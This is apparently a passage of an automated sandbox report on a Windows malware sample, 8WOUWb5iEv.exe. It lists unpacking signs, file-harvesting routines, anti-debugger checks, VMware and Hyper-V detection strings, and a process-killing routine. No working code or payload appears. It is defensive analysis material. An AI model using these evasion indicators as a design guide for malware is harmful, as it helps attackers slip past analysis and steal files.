                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: Binary string: my_library.pdbU source: 8WOUWb5iEv.exe, 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: my_library.pdb source: 8WOUWb5iEv.exe, 8WOUWb5iEv.exe, 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeUnpacked PE file: 0.2.8WOUWb5iEv.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeUnpacked PE file: 0.2.8WOUWb5iEv.exe.400000.1.unpack
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0041B335 push ecx; ret 0_2_0041B348
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0086241D push 7D7C6160h; retf 0_2_00862422
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02479280 push ecx; ret 0_2_02479293
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0240B59C push ecx; ret 0_2_0240B5AF
                      Source: 8WOUWb5iEv.exeStatic PE information: section name: .text entropy: 7.618486265802441
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-44687
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeEvaded block: after key decisiongraph_0-45847
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeAPI coverage: 6.7 %
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_004140F0
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E530
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE40
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040EE20
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414B60
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00413B00
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DF10
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_004147C0
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DB80
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F7B0
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02404357 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_02404357
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023FC0A7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_023FC0A7
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023FF087 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_023FF087
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023FE177 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_023FE177
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023FE797 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_023FE797
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023FFA17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_023FFA17
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02404A27 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_02404A27
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023F1977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_023F1977
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02403D67 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_02403D67
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02404DC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02404DC7
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023FDDE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_023FDDE7
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                      Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHH
                      Source: Amcache.hve.3.drBinary or memory string: VMware
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: 8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeAPI call chain: ExitProcess graph end nodegraph_0-44694
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeAPI call chain: ExitProcess graph end nodegraph_0-44675
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeAPI call chain: ExitProcess graph end nodegraph_0-44686
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeAPI call chain: ExitProcess graph end nodegraph_0-44672
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeAPI call chain: ExitProcess graph end nodegraph_0-44715
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeAPI call chain: ExitProcess graph end nodegraph_0-44693
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeAPI call chain: ExitProcess graph end nodegraph_0-44514
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeAPI call chain: ExitProcess graph end nodegraph_0-44560
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041B058
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00404610 VirtualProtect ?,00000004,00000100,000000000_2_00404610
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00419AA0 mov eax, dword ptr fs:[00000030h]0_2_00419AA0
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00860083 push dword ptr fs:[00000030h]0_2_00860083
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023F092B mov eax, dword ptr fs:[00000030h]0_2_023F092B
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02409D07 mov eax, dword ptr fs:[00000030h]0_2_02409D07
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_023F0D90 mov eax, dword ptr fs:[00000030h]0_2_023F0D90
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004179E0
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041B058
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0041D21A SetUnhandledExceptionFilter,0_2_0041D21A
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0041B63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B63A
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0240B2BF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0240B2BF
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0240D481 SetUnhandledExceptionFilter,0_2_0240D481
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_0240B8A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0240B8A1
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: 8WOUWb5iEv.exe PID: 6720, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_004198E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_004198E0
